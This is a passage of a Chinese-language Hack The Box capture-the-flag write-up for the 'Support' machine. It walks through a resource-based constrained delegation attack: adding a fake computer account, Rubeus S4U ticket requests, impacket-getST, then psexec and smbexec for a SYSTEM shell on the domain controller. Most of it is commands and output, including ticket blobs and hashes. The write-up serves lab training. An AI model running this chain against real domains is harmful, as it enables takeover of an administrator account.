      mYbINItObha+5rnMINNadXek6fH5m+XDKu/Pg7ncng7nL1kwMjmqVUBfHUjvaukbpMhEwRUQOmhhQi60
      7vinZ6zdxwZCz+AfBd/9YTKBj6J/R8s5PJRHT4ysp6ZzWS4c2GqE3+YZAQGB6nLfcD9Doqfg1WhLjpEm
      +1MHNvDsVDNm4S5/JFAVysI/ngG8O8Q2pRqdI9bdpa2Oql5vmAm3vWMtPhcKkFf03Q801Bv0cAAhWKRC
      SaZjYVwwGxCSywgdu9ubN05FFSgEKphH2I9uhE6OZvuKi8aBR+2cHmytSxxkK+ExkkADInhD3Nl0EcVb
      5hWEPzOneooBXWp4uA0nySfWVPghdZI/w9RlsU4tFNRwkuw4UNokYlPFL8vFoPyhO0aU3zXcFQdfw/OM
      ROCXx86c12QOR/3kSrB9Y+u0oZvg+gWVOUyCMmodQ/LKO67Wrk9auHXOKsj1px5bpaBNQLcndRLJY9GP
      kIBqtBpXE2hwNafKve0vKfFOqj16laow2K+mN/l1cPwVIiR0uLiwfjYPMU/th7+LH2gPb1rV1g/OKBJW
      z4fGIY3tEmKZiM7js9fudITTwbz7TwP1uAzru2wyJKhj61BgkSdRTduoXFLEAGfuD9acf/nnzMmf6NRo
      S0QdaliUKZKvwWBBgpVOa0jZvfG46NVrOzOt/a1PmmCK81d8vSh5csC1Yob01Ba5Rmgbo4HcMIHZoAMC
      AQCigdEEgc59gcswgciggcUwgcIwgb+gGzAZoAMCARehEgQQEv8SLEiw3b2oguzZg5NtpqENGwtTVVBQ
      T1JULkhUQqIeMBygAwIBAaEVMBMbETB4ZGZGYWtlQ29tcHV0ZXIkowcDBQBA4QAApREYDzIwMjQwMzIx
      MDMyMzI1WqYRGA8yMDI0MDMyMTEzMjMyNVqnERgPMjAyNDAzMjgwMzIzMjVaqA0bC1NVUFBPUlQuSFRC
      qSAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0Yg==


[*] Action: S4U

[*] Using domain controller: dc.support.htb (::1)
[*] Building S4U2self request for: '0xdfFakeComputer$@SUPPORT.HTB'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'administrator' to '0xdfFakeComputer$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

      doIFtjCCBbKgAwIBBaEDAgEWooIEyzCCBMdhggTDMIIEv6ADAgEFoQ0bC1NVUFBPUlQuSFRCoh4wHKAD
      AgEBoRUwExsRMHhkZkZha2VDb21wdXRlciSjggSHMIIEg6ADAgEXoQMCAQGiggR1BIIEcUsqfqtDBjH5
      gvs6fZzyNI/ps53Euq9wHQbAr2b4viNYhY+1gcbmm1YqiMzWjhM5sYx8tNgDJ7tb5nYkCiZK1M42NRXC
      te+jLtY9Ehd7zT687SDzzYzelki0LVSU2LoU+Y2c73EaQaIJPpr+reCKv0HF3PfnIwRzHp7EfEnPy+5l
      dvoDYCYCJVJ7qD5sPqjl+DTARModRPgr/BMm0IRISLfsZY6u21k3Go/mK8LuxPXj1BQuMVl98BEDjsi8
      y6UXe/vJELxOFqTkeM9dp9tz3KdoDxt7AnadFaGABt6UcsiCMsH/QFb/TM5jx++0mDRCap2JOWbsL6bX
      dupLiETzxbHDfWcpOclBN81Rqn0T83jFNi4uu2GdZpXhLX2XIK/rx2rxrQv94oo88o+xeujiD621x+4o
      2IHuY6hhbhRec6v4iKA98mwc3GEximMX8sexqsZbt6ahnZWWxOWpuesHjGBtMeouza2ERl4lGSNjcAg0
      uLMDh86qOiCREYcyZk3gHsihWl/UIUOz45wbAf6vPF5efDr5hm0ml6rdp5CWWlun/1AkbeyskMRr0Aa4
      L84Xk+ILaBen1wn6MnpG/2gE+3IPt/lVooBs8avcg/9L+MzJPVOJKIoncw8q9DlDZlD3IXEORguSR4x8
      /+2Hu6nxF9K1aZAzKMYortaK/OqzbzprpLV8XKw/7/OTJbk+dSYUcvRLE4TKl2uBrZR60kd4uI6ft2KO
      ePWYedjasM9/M7CdXVG6hBRU6RRx9ygXkoltGFssj+RVWqRevBPvPEmNO9QUueim7Wp156kBGxuFN/rr
      9tsL8DQStQABH4CdDMKonGrzYhC43G/7bxVYkBYqKcbQ68DaSBmsHit7Wpk4kneLEichaUWeuQxfXgmG
      UGoBSx3tkNOTs6XNyO+S4uRReVOy12rxzWkvUX0HycrtDNh3XxiTzD2CnVZW9STPGdREkJX5bK8w9oo4
      Ctdtv1VznBsR19wXUlFO0rtf7CcnnoOoBYUWXx5BcJHK7Xfj0YklPAuHpm0UM/Aj42OLGUQ5A/RDiNZW
      I0xX1y6CiebK/cBJRZrCW0JbGi0BdP+/vP8P7PqsN7L+7m0UjhRx9tNvBIj7do5xzUIx8XKobLai+OJX
      4wu8nuqEzl3DEkxHjFqSbNoRqenrBJXbHZwxkwlGpvmMLlrbxioGJpniA1bKtYqXsis0IZw5rRR/z1nf
      EbIbp3T3KaNd9vgglWrRM4e3U5XgKIwtSYLjo4/fac+e1L5+SKByDsySMExqIITua0O0LgNvdN0bVCUz
      7SxTkVi2ruJBBlNki6IQ439FyFY9wGORgMRWrtAZjlDp2adr28t+Kb+gBmaUV8ZrsNu+6LAAvBSGiOAN
      1QL/zCEpBuxt3MxH1vLSznKJpkoWL70pBV2xi5FD+MoXrFCFCply9lNSDgflXaBcDkOCIkn6d7OQrR0p
      4YPcf4vgvce/nG9cq5XlufrlNMGEYwptvW0rmOlWddXvElc2yCiG2QrqwzCqvHlpa6OB1jCB06ADAgEA
      ooHLBIHIfYHFMIHCoIG/MIG8MIG5oBswGaADAgEXoRIEEE8hAezCHlYBuvR6V11OWxmhDRsLU1VQUE9S
      VC5IVEKiGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQBAoQAApREYDzIwMjQwMzIxMDMyMzI1
      WqYRGA8yMDI0MDMyMTEzMjMyNVqnERgPMjAyNDAzMjgwMzIzMjVaqA0bC1NVUFBPUlQuSFRCqR4wHKAD
      AgEBoRUwExsRMHhkZkZha2VDb21wdXRlciQ=

[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      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
[+] Ticket successfully imported!
*Evil-WinRM* PS C:\Users\support\Desktop>

32、查看票据情况

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe klist

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x228020

  UserName                 : support
  Domain                   : SUPPORT
  LogonId                  : 0x228020
  UserSID                  : S-1-5-21-1677581083-3380853377-188903654-1105
  AuthenticationPackage    : NTLM
  LogonType                : Network
  LogonTime                : 3/20/2024 8:10:46 PM
  LogonServer              : DC
  LogonServerDNSDomain     : support.htb
  UserPrincipalName        : support@support.htb

    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 3/20/2024 8:23:25 PM ; 3/21/2024 6:23:25 AM ; 3/27/2024 8:23:25 PM
      Server Name       : cifs/dc.support.htb @ SUPPORT.HTB
      Client Name       : administrator @ SUPPORT.HTB
      Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)

*Evil-WinRM* PS C:\Users\support\Desktop>

33、远程使用，我将获取最后生成的票证Rubeus，并将其复制回我的计算机，将其另存为ticket.kirbi.b64，确保删除所有空格。我将其 base64 解码为ticket.kirbi：

┌──(kali㉿offsec)-[~/Desktop]
└─$ base64 -d ticket.kirbi.b64 > ticket.kirbi

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-ticketConverter ticket.kirbi ticket.ccache 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done

34、我可以使用它来获取 shell psexec.py：

┌──(kali㉿offsec)-[~/Desktop]
└─$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file OfkknBGb.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service DCRe on dc.support.htb.....
[*] Starting service DCRe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 955A-5CBB

 Directory of C:\Users\Administrator\Desktop

05/28/2022  04:17 AM    <DIR>          .
05/28/2022  04:11 AM    <DIR>          ..
03/20/2024  06:29 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,972,321,280 bytes free

C:\Users\Administrator\Desktop>

35、获取下最终flag信息

C:\Users\Administrator\Desktop> type root.txt
99ed202f462e3da8e669eaee03d6e250

C:\Users\Administrator\Desktop> 

附录：其他方法

继续执行该计划，我们将使用evil-winrm将 Powermad 上传到目标服务器。随后，提供的命令将向 AD 对象添加一台假计算机，使用约束委派权限配置新的假计算机，并为这个新创建的实体生成密码哈希。

*Evil-WinRM* PS C:\Users\support\Desktop> 
*Evil-WinRM* PS C:\Users\support\Desktop> Set-Variable -Name "FakePC" -Value "FAKE01"
*Evil-WinRM* PS C:\Users\support\Desktop> Set-Variable -Name "targetComputer" -Value "DC"
*Evil-WinRM* PS C:\Users\support\Desktop> New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = FAKE01$
Verbose: [+] Distinguished Name = CN=FAKE01,CN=Computers,DC=support,DC=htb
[+] Machine account FAKE01 added
*Evil-WinRM* PS C:\Users\support\Desktop> Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')
*Evil-WinRM* PS C:\Users\support\Desktop> Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE01,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :



*Evil-WinRM* PS C:\Users\support\Desktop>


通过“New-MachineAccount”命令成功将虚假计算机对象添加到 AD 后，后续步骤涉及利用内置 AD 模块。具体来说，“Set-ADComputer”命令用于向新添加的假计算机授予约束委派权限。最后的“Get-ADComputer”命令用作验证步骤，确保已添加由 CN FAKE01 表示的计算机。在 Windows 中，添加计算机对象的默认配额通常设置为 10。


Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota


*Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota
The term 'Get-DomainObject' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machine ...
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Get-DomainObject:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\support\Desktop> 
                                        
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module ./PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

ms-ds-machineaccountquota
-------------------------
                       10


*Evil-WinRM* PS C:\Users\support\Desktop> 


展望未来，我们的下一步涉及使用 Rubeus 为新创建的假计算机对象生成密码哈希值。假设我们将此对象的密码设置为“123456”，我们将把 Rubeus.exe 上传到目标服务器并执行指定的命令。此操作将促进用户服务 (S4U) 攻击，使我们能够代表管理员获取 Kerberos 票证。

.\Rubeus.exe  hash /password:123456 /user:FAKE01$ /domain:support.htb


*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe  hash /password:123456 /user:FAKE01$ /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: Calculate Password Hash(es)

[*] Input password             : 123456
[*] Input username             : FAKE01$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostfake01.support.htb
[*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4
[*]       aes128_cts_hmac_sha1 : 4799D0F80833802EE7F1412BD30DCD5C
[*]       aes256_cts_hmac_sha1 : 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B
[*]       des_cbc_md5          : 836D4C85A4F23B62

*Evil-WinRM* PS C:\Users\support\Desktop>


成功利用该安全漏洞并授予计算机对象 FAKE01 冒充他人的权利后，我们的下一步是请求新的 Kerberos 票证授予票证 (TGT)。该请求将从我们的攻击 Kali 计算机发出，允许我们在模拟用户管理员的同时访问 dc.support.htb 上的资源。


impacket-getST support.htb/FAKE01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-getST support.htb/FAKE01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache


KRB5CCNAME=administrator.ccache impacket-smbexec support.htb/administrator@dc.support.htb -no-pass -k


┌──(kali㉿offsec)-[~/Desktop]
└─$ KRB5CCNAME=administrator.ccache impacket-smbexec support.htb/administrator@dc.support.htb -no-pass -k
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd C:/Users/Administrator/Desktop
[-] You can't CD under SMBEXEC. Use full paths.
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
99ed202f462e3da8e669eaee03d6e250

C:\Windows\system32>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/484